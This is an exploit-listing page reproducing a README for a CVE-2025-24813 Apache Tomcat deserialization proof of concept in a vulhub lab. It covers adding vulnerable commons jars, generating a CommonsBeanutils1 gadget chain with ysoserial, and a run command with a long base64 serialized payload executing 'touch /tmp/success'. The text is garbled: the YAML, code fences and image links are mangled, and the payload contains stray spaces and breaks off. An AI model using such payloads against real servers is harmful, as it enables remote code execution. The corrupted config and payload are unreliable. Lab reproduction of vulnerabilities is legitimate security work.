Sploitus

Exploit for Deserialization of Untrusted Data in Apache Tomcat

githubexploit Β· 2025-04-18

Exploit Code

README56 lines
## https://sploitus.com/exploit?id=F4BC4A59-1624-5443-8349-107BAD5E50B5
# CVE-2025-24813-vulhub
POC script for the vulhub environment of CVE-2025-24813

Since there are many partners who feel confused about the exploitation of this vulnerability, this script has been written to help you carry out the exploit in vulhub.

Check out the details: [vulhub/tomcat/CVE-2025-24813](https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2025-24813)

There is no chain that can be directly exploited in the environment of vulhub (`URLDNS` doesn't count), so the original docker-compose.yml file is modified to add some jar packages with vulnerability dependencies, and I prepared three jar packages here, namely: `commons-beanutils-1.9.2. jar`, `commons-collections-3.2.1.jar`, `commons-logging-1.1.1.jar`, these three jar packages will be able to hit most of the CC, CB chain.

Considering the high JDK8 version in that environment, I'm utilizing the `CommonsBeanutils1` chain with no JDK version requirement here.

First modify docker-compose.yml, you need to import the three jar packages into the `vulhub/tomcat/CVE-2025-24813` directory like this:

! [image-20250418191941597] (. /assets/image-20250418191941597.png)

Then modify the docker-compose.yml file as follows:

```yaml
services.
tomcat.
build: .
ports: .
- "8080:8080"
volumes: .
- . /commons-beanutils-1.9.2.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-beanutils-1.9.2.jar
- . /commons-collections-3.2.1.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar
- . /commons-logging-1.1.1.jar:/usr/local/tomcat/webapps/ROOT/WEB-INF/lib/commons-logging-1.1.1.jar

``

! [image-20250418191825341](. /assets/image-20250418191825341.png)

Then start the environment:

! [image-20250418192107397](. /assets/image-20250418192107397.png)

Then use ysoserial to generate the corresponding `CommonsBeanutil1` chain and encode it using base64, or you use a tool I wrote called `ycpm` as follows:

The chain is the execution of the command `touch /tmp/success`.

``
java -jar ycpm-0.0.2-all.jar "CommonsBeanutils1" "touch /tmp/success" "base64->print"
``

! [image-20250418192217640](. /assets/image-20250418192217640.png)

Then just copy the base64 and run the script. Below:

! [image-20250418193145156](. /assets/image-20250418193145156.png)

If you just want to verify the vulnerability effect, you can copy my command:

``
python . \CVE-2025-24813.py --host=192.168.137.132 --port=8080 --session-id=poc --base64-payload= rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgA /b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmNvbXBhcmF0b3JzLkNvbXBhcmFibGVDb21wYXJhdG9y+/ SZJbhusTcCAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB +AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAAAABdXIAAltCrPMX+ AYIVOACAAB4cAAABpvK/rq+ AAAANAA5CgADACIHADcHACUHACYBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFrSCT85Hd7z4BAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAE1N0dWJUcmFuc2xldFBheWxvYWQBAAxJbm5lckNsYXNzZXMBADJMb3JnL2Vyb3Npb24yMDIwL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAnAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4v ==
``